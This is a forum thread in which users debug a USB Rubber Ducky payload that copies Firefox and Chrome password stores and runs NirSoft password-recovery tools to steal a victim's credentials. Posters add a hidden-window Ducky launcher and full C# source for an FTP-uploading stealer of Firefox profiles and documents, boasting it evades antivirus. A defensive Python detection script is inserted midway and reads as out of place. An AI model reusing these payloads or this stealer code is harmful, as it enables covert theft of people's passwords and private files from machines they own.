[NEED HELP] With a stealer payload


h4x0r666


What is wrong with this? I just got my Rubber Ducky but it's not doing what I want.. it just opens some random things and types the rest of the code there.. I made the inject.bin with http://www.iducke.com/Encoder/ because I have no Linux beside me at the moment -.-"

this is the payload:

REM ######################################################################################################
REM # Author: H4x0r666                                                                                   #
REM # OS Designed and Tested on: Windows Vista Home Basic                                                #
REM #                                                                                                    #
REM # This script was developed and intended to:                                                         #
REM #                                                                                                    #
REM #   1.) Copy the Firefox key3.db & signons.sqlite (as passwords backup)                              #
REM #   2.) Copy the Google Chrome Login Data (as passwords backup)                                      #
REM #   3.) Starts iepv.exe to copy the Internet Explorer passwords                                      #
REM #   4.) Starts OperaPassView.exe to copy the Opera passwords                                         #
REM #   5.) Starts mailpv.exe to copy the mail passwords                                                 #
REM #   6.) Starts BulletsPassView.exe to copy the passwords behind bullets (the hidden passwords..)     #
REM #   7.) Starts netpass.exe to copy the net passwords                                                 #
REM #   8.) Starts WirelessKeyView.exe to copy the wireless keys                                         #
REM #                                                                                                    #
REM # All through cmd commands..                                                                         #
REM ######################################################################################################
DELAY 500
GUI d
DELAY 500
CONTROL ESCAPE
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
LEFT
ENTER
DELAY 750
ALT SPACE
STRING m
DOWNARROW
REPEAT 100
ENTER
DELAY 25
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d
DELAY 100
STRING cd %AppData%\Mozilla\Firefox\Profiles
ENTER
STRING cd
SPACE
TAB
ENTER
STRING COPY key3.db %homepath%\Contacts
ENTER
STRING COPY signons.sqlite %homepath%\Contacts
ENTER
STRING MOVE /Y %homepath%\Contacts\key3.db %myd%
ENTER
STRING MOVE /Y %homepath%\Contacts\signons.sqlite %myd%
ENTER
DELAY 100
STRING cd %LocalAppData%\Google\Chrome\User Data\Default
ENTER
STRING COPY "Login Data"
SPACE
STRING %homepath%\Contacts
ENTER
STRING MOVE /Y "%homepath%\Contacts\Login Data"
SPACE
STRING %myd%
ENTER
DELAY 200
STRING %myd%\Programs\iepv.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING ie_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\OperaPassView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING opera_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\mailpv.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING mail_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\BulletsPassView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING bb_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\netpass.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING net_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\WirelessKeyView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING wireless_keys.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING exit
ENTER 

EDITED AGAIN..... Please see my last post^^

Edited by h4x0r666
added spoiler tag

I need it to start cmd as administrator.. and I have a question also^^ What happens if an AV detects a malicious file? Because the last program somehow got a false warning detected, but I ignored it with my AV, so I don't know what would happen if everything worked but it still got detected? I am not going to crypt it :P too much work^^ But I can't make the inject.bin if I use CTRL-SHIFT ESC :( it gives me an error, so I have to find another way to open cmd as admin.. (I changed the first line because it doesn't need to start with GUI r but just with GUI, I guess? (the start menu..) same as CTRL-SHIFT ESC? Please someone help fixing it..


I thought:

  • CTRL-SHIFT ESC - Start Task Manager
  • CTRL-SHIFT ENTER - Run as Admin

Also

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

only needs to be done once, then you can use the following below (less to type):

%myd%/whatever.exe
Edited by midnitesnake

Yeah I meant CONTROL ESCAPE instead of CTRL+SHIFT+ESC.. but http://www.iducke.com/Encoder/ gives the following error..

CTRL-SHIFT ENTER is an unrecognized command

EDIT: This works though..

GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER 

But I need it to start as admin and that's not the case with that code, because when I start cmd through CONTROL ESCAPE > CMD > CTRL-SHIFT ENTER (manually) it can start any program directly as admin without asking again, but with the above code it may look like it started as admin but it's not, because if you try to start a program it will still ask to accept or cancel..

Edited by h4x0r666

I edited the whole payload again.. I am trying all kinds of stuff but it just doesn't do what I want it to do, please someone help me^^

I used encoder 2.3, so yes, it made the inject.bin successfully, but there must be something with the script..

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d

That above line only works when I have the SD card in my reader but not in the Ducky (and yes it's called h4x0r666), but that can't be the problem.

And is there something with the REPEAT 100, because it's not going down.. someone please try and test it and if possible give me the inject.bin & modified payload.

Manually almost everything does what I want.. but the Ducky doesn't^^


Unfortunately it takes time to mount the SD card before the executables on it can be accessed. The script probably tried accessing them before the drive had been mounted. Take a look at the payload "Run EXE from SD" on the wiki. Posting it here also. The payload waits for the SD card to mount.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

I seem to remember that one of the firmware versions had a feature where pressing the button would replay the script. This would be another solution to the problem. Yet another solution would be to make the ducky execute when using one of the keyboard modifiers like num lock or scroll lock.

Edited by overwraith
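As an added detection example for the two payloads posted above (not code from this thread or any of its posters), the script below runs over constructed Sysmon-style process-creation and file-creation events and flags the host-side traces those payloads leave: the cmd flag combination typed verbatim, the wmic volume-by-label lookup used to find the SD card, the NirSoft password tools run from a shell, the wscript/invis.vbs batch runner, and copies of key3.db, signons.sqlite or "Login Data" written outside a browser profile. The event format, paths, PIDs and user name are all constructed; a real EDR or Sysmon feed would be mapped onto the same five fields.

```python
"""Detection for the Ducky credential-stealer behaviours discussed in this thread.

Added example; event format and sample lines are constructed:
  type|pid|parent_image|image|command_line (ProcessCreate) or target_path (FileCreate)
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: the first seven lines mirror the payloads above,
# the last two are benign Firefox activity that must not alert.
SAMPLE_EVENTS = """\
ProcessCreate|4100|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd /Q /D /T:7F /F:OFF /V:ON /K
ProcessCreate|4104|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic volume get driveletter, label
ProcessCreate|4110|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\findstr.exe|findstr "H4X0R666"
FileCreate|4100|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|C:\\Users\\alice\\Contacts\\key3.db
FileCreate|4100|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|C:\\Users\\alice\\Contacts\\Login Data
ProcessCreate|4120|C:\\Windows\\System32\\cmd.exe|E:\\Programs\\iepv.exe|E:\\Programs\\iepv.exe
ProcessCreate|4130|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe invis.vbs DuckyWait.bat
ProcessCreate|4140|C:\\Windows\\explorer.exe|C:\\Program Files\\Mozilla Firefox\\firefox.exe|firefox.exe
FileCreate|4140|C:\\Windows\\explorer.exe|C:\\Program Files\\Mozilla Firefox\\firefox.exe|C:\\Users\\alice\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ab12.default\\key3.db
"""

# Tool and file names taken from the payloads in this thread.
PASSWORD_TOOLS = {"iepv.exe", "operapassview.exe", "mailpv.exe",
                  "bulletspassview.exe", "netpass.exe", "wirelesskeyview.exe"}
CREDENTIAL_STORES = {"key3.db", "signons.sqlite", "login data"}
BROWSERS = {"firefox.exe", "chrome.exe"}
BROWSER_PROFILE_DIRS = ("\\mozilla\\firefox\\profiles\\", "\\google\\chrome\\user data\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse(text: str) -> List[dict]:
    events = []
    for line in text.splitlines():
        if line.strip():
            kind, pid, parent, image, arg = line.split("|", 4)
            events.append({"type": kind, "pid": int(pid), "parent": parent,
                           "image": image, "arg": arg})
    return events


def detect(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for events that match a payload behaviour."""
    hits: List[Tuple[int, str]] = []
    for e in events:
        img, parent, low = basename(e["image"]), basename(e["parent"]), e["arg"].lower()
        if e["type"] == "ProcessCreate":
            # cmd started with the colour/echo flag combination the payload types verbatim
            if img == "cmd.exe" and all(f in low for f in ("/t:7f", "/v:on", "/k")):
                hits.append((e["pid"], "cmd-payload-flags"))
            # volume listing by label: how the payload locates its own SD card
            if img == "wmic.exe" and parent == "cmd.exe" and "volume get driveletter" in low:
                hits.append((e["pid"], "volume-label-enumeration"))
            # NirSoft password-recovery tools launched from a shell
            if img in PASSWORD_TOOLS and parent == "cmd.exe":
                hits.append((e["pid"], "password-recovery-tool"))
            # wscript running a .vbs whose argument is a .bat (the invis.vbs hidden runner)
            if img == "wscript.exe" and re.search(r"\.vbs\s+\S+\.bat\b", low):
                hits.append((e["pid"], "vbs-hidden-batch"))
        elif e["type"] == "FileCreate":
            # browser credential store written outside any profile directory by a non-browser
            if (basename(low) in CREDENTIAL_STORES and img not in BROWSERS
                    and not any(d in low for d in BROWSER_PROFILE_DIRS)):
                hits.append((e["pid"], "credential-store-copied"))
    return hits


def score_by_pid(hits: List[Tuple[int, str]]) -> Dict[int, int]:
    """Distinct rules per process, so a chain of behaviours ranks above one hit."""
    seen: Dict[int, set] = {}
    for pid, rule in hits:
        seen.setdefault(pid, set()).add(rule)
    return {pid: len(rules) for pid, rules in seen.items()}


if __name__ == "__main__":
    for pid, rule in detect(parse(SAMPLE_EVENTS)):
        print(pid, rule)
```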

Np, encoding goes smoothly and the ALT F4 is to close the extra windows from iepv.exe, OperaPassView.exe, mailpv.exe .. etc. And yes, I have looked over that script, but how long does it need to take to see my SD card? It sees my Ducky directly.. so since it also executes the inject.bin (from the SD card), why doesn't it see the SD card with the command? And why isn't the (hide window) working? I used the snippets from the official payloads... ..


I've done this an easier way, I think. I've made a small, stealthy C#.NET file which uploads files to my FTP server. It's programmed with lots of try...catch blocks that simply gracefully degrade the program if it comes across any errors at all. I call it Firefox Extinguisher.

There are currently four flavours of the program:

FFE: Mission Critical - Uploads key3.db, signons.sqlite and cert8.db of all profiles (scans profiles.ini for non-standard installations).

FFE: Sidejacker - The same as above, but includes cookies.sqlite, places.sqlite and any bookmark backups.

FFE: Clone Wars - Uploads the entirety of any Firefox profile path found.

FFE: DEFCON1 - Uploads all Firefox profiles, My Pictures, My Documents and acts as a daemon watching for changes in any Sidejacker files, reuploads any updated files and persists through reboot. The memory footprint is only about 120KB on idle.

All versions come with LockSafing, allowing files to be uploaded, even if they are currently in use (i.e. if Firefox is open and in use).

I know it's slightly on a tangent to the thread, but if you do have any background in programming, or fancy playing around with .NET, it's a relatively simple app to write and a lot easier to run with the duck, using the wget and execute script.


The REPEAT command is not supported in the duck encoder.jar (only the IDE, which is v1 and now outdated).

Down arrow is based off the basic HID mapping keyboard.properties, or corrected by your individual country-code.properties file; if this is incorrect, please inform us of the patch?

The firmware just echoes commands from the encoder; you could try "DOWN" rather than "DOWNARROW".


I don't think it does the down key at all, look at this screenshot I just made.. (just before it quit)

Yes.. Sorry if you don't understand everything, I'm Dutch, but you can guess the output.. (screenshot: MDX5WKG.jpg)

And yes ApacheTech Consultancy, I'm interested if you could show us some example payload with your nice file :D

and.. for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d

I just waited and tried it some more while the Ducky did its thing (screenshot..) but it can't find the SD card.. I wonder how it executes the inject.bin if the SD directory isn't detected o.0 well it's my first day of using my Ducky but anyway.. feels bad that it failed

Edited by h4x0r666

The FTP Wrapper class I'm using is here: http://netftp.codeplex.com/releases/view/95632

The main bulk of the program is written using Extension Methods. These are the main ones. Please excuse the lack of annotation.

using System;
using System.IO;
using System.Windows.Forms;
using Ftp = System.Net.FtpClient;

namespace ffe
{
    public static class ExtensionsMethods
    {
        public static Ftp.FtpClient ftp = new Ftp.FtpClient()
        {
            Host = "REDACTED",
            Credentials = new System.Net.NetworkCredential("REDACTED", "REDACTED"),
            DataConnectionType = Ftp.FtpDataConnectionType.PASVEX,
        };

        public static string baseDir =
            String.Format(@"{0}/{1}", Environment.MachineName, Environment.UserName);

        public static string ToFtpPath(this String s, string basePath, string section)
        {
            return String.Format(@"{0}/{1}/{2}",
                baseDir, section, s.Substring(basePath.Length).Replace(@"\", @"/"));
        }

        public static bool ExistsOnServer(this FileInfo f, string section, string basePath)
        {
            try
            {
                ftp.Connect();
                if (ftp.FileExists(f.FullName.ToFtpPath(basePath, section)))
                {
                    return true;
                }
                else
                {
                    return false;
                }
            }
            catch (Exception)
            {
                Application.Exit();
                return false;
            }
            finally
            {
                ftp.Disconnect();
            }
        }

        public static void Upload(this FileInfo f, string section, string basePath)
        {
            FileInfo ls; 
            { try { ls = f.LockSafe(); } catch (Exception) { return; } }
            if (ls.Length == 0) return;
            byte[] b = File.ReadAllBytes(ls.FullName);
            string rPath = f.FullName.ToFtpPath(basePath, section);
            string rDir = rPath.Substring(0, rPath.LastIndexOf("/"));
            try
            {
                ftp.SetDataType(Ftp.FtpDataType.Binary);
                { try { ftp.Connect(); } catch (Exception) { return; } }
                if (!ftp.DirectoryExists(rDir)) { ftp.CreateDirectory(rDir); }
                using (Stream o = ftp.OpenWrite(f.FullName.ToFtpPath(basePath, section)))
                {
                    Console.Write(f.FullName.ToFtpPath(basePath, section) + " ..... ");
                    try
                    {
                        while (o.Position <= b.Length) { o.Write(b, 0, b.Length); }
                        Console.WriteLine("[ OK ]");
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine("[ FAILED ]");
                        Console.WriteLine("Error:" + ex.Message);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error:" + ex.Message);
            }
            finally
            {
                f.CleanLockSafe();
                ftp.Disconnect();
            }
        }

        public static FileInfo LockSafe(this FileInfo file)
        {
            // Create a file stream.
            FileStream stream = null;

            try
            {
                // Try to open the file.
                stream = file.Open(FileMode.Open, FileAccess.ReadWrite, FileShare.None);
            }
            catch (IOException)
            {
                // The file is unavailable because it is:
                // Still being written to or is being processed by another thread.
                file.CleanLockSafe();
                File.Copy(file.FullName, file.FullName + ".ffe");
                return new FileInfo(file.FullName + ".ffe");
            }
            finally
            {
                if (stream != null)
                    stream.Close();
            }

            // File is not locked
            return file;
        }

        public static void CleanLockSafe(this FileInfo f)
        {
            if (File.Exists(f.FullName + ".ffe"))
            {
                File.Delete(f.FullName + ".ffe");
            }
        }
    }
}

Then, just a very simple controller class for the victim.

using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Net;

namespace ffe
{
    public static class Victim
    {
        public static bool IsOnline
        {
            get
            {
                try
                {
                    using (var client = new WebClient())
                    using (var stream = client.OpenRead("http://www.google.com"))
                    {
                        return true;
                    }
                }
                catch
                {
                    return false;
                }
            }
        }

        public static string Documents
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\";
            }
        }
        public static string Pictures
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\";
            }
        }
        public static string AppData
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\";
            }
        }
        public static string FirefoxProfiles
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
                     + @"\Mozilla\Firefox\";
            }
        }
        public static string ProgramFiles
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + @"\";
            }
        }
        public static string Downloads
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.UserProfile)
                    + @"\Downloads";
            }
        }
    }
}

And finally, the file lists themselves:

using System.Collections.Generic;
using System.IO;
using System.Linq;

namespace ffe
{
    public static class FFE
    {
        public static List<FileInfo> MissionCriticalFileList
        {
            get
            {
                // Gather a list of files.
                List<FileInfo> tmpList = new List<FileInfo>();
                string[] dirs = Directory.GetDirectories(
                    Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly);
                foreach (string dir in dirs)
                {
                    if (!dir.EndsWith("history"))
                    {
                        Directory.EnumerateFiles
                            (Victim.FirefoxProfiles, "*", SearchOption.AllDirectories).Where((p)
                                => p.EndsWith("signons.sqlite")
                                || p.EndsWith("key3.db")
                                || p.EndsWith("cert8.db"))
                        .ToList<string>()
                        .ForEach((p) => tmpList.Add(new FileInfo(p)));
                    }
                }
                return tmpList;
            }
        }

        public static List<FileInfo> FullProfilesList
        {
            get
            {
                // Gather a list of files.
                List<FileInfo> tmpList = new List<FileInfo>();
                string[] dirs = Directory.GetDirectories(
                    Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly);
                foreach (string dir in dirs)
                {
                    Directory.EnumerateFiles
                        (Victim.FirefoxProfiles, "*", SearchOption.AllDirectories).Where((p)
                            => (!p.Contains("minidumps")))
                        .ToList<string>()
                        .ForEach((p) => tmpList.Add(new FileInfo(p)));
                }
                return tmpList;
            }
        }

        public static List<FileInfo> Documents
        {
            get
            {
                List<FileInfo> tmpList = new List<FileInfo>();

                // Gather a list of the topmost directories.
                string[] dirs = Directory.GetDirectories(Victim.Documents, "*",
                    SearchOption.TopDirectoryOnly);

                // Cycle through each top layer directory.
                foreach (string dir in dirs)
                {
                    // If the folder is write-protected, skip it.
                    if (!dir.EndsWith("My Music")
                      & !dir.EndsWith("My Pictures")
                      & !dir.EndsWith("My Videos"))
                    {
                        // Add all files in all readable subdirectories to a list.
                        Directory.GetFiles(dir, "*.*", SearchOption.AllDirectories)
                            .ToList<string>()
                            .ForEach((p) => tmpList.Add(new FileInfo(p)));
                    }
                }
                return tmpList;
            }
        }
    }
}

Once you have all that, it's relatively self explanatory what goes where.

FFE.FullProfilesList.ForEach((p) => p.Upload("Firefox", Victim.FirefoxProfiles));

It's fully undetected on all of the online av scraper sites I've tried.


Nice haha, but anyway I got the DOWN thing working.. by replacing:

ALT SPACE
STRING m
DOWNARROW
REPEAT 100
ENTER

With:

ALT SPACE
DOWNARROW
ENTER
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER

(But then 100 times the DOWNARROW because I guess... .. the REPEAT function isn't even working?)

But do I need something extra to be able to run files from the SD card while it is mounted by the Ducky? o.0

please explain :D


But do I need something extra to be able to run files from the SD card while it is mounted by the Ducky? o.0

please explain :D

You need TwinDuck Firmware.

What firmware are you running at the moment?


The encoding process in 2.3 is done in less than a second, while in 2.4 it either takes very, very long.. or it just doesn't work, but I quit after waiting a couple of minutes :unsure: is it working for you correctly just like in 2.3 :blink: ? (I have Windows Home Basic, if the OS is the problem, which it wasn't on 2.3) and I have no idea what firmware I have at the moment.. since I just got my Ducky I guess the default firmware it should have? What is the difference in TwinDuck firmware? What do you recommend me.. ^_^


The TwinDuck firmware allows you to use the Duck as a Mass Storage Device, as well as a HID. There is a step by step guide to flashing your duck with the new firmware in the Stickies on the forum.

Which duck are you using currently, i.e. what colour is the board? This will give us an indication of which stock firmware you are currently using. It is possible that commands which have either been added or deprecated are causing errors with your compiler. If you use the TwinDuck Firmware, make sure you use the latest versions of the compiler and make sure your Java files are up to date (or at least Java 1.7.0). This will give you the best chance of completion.
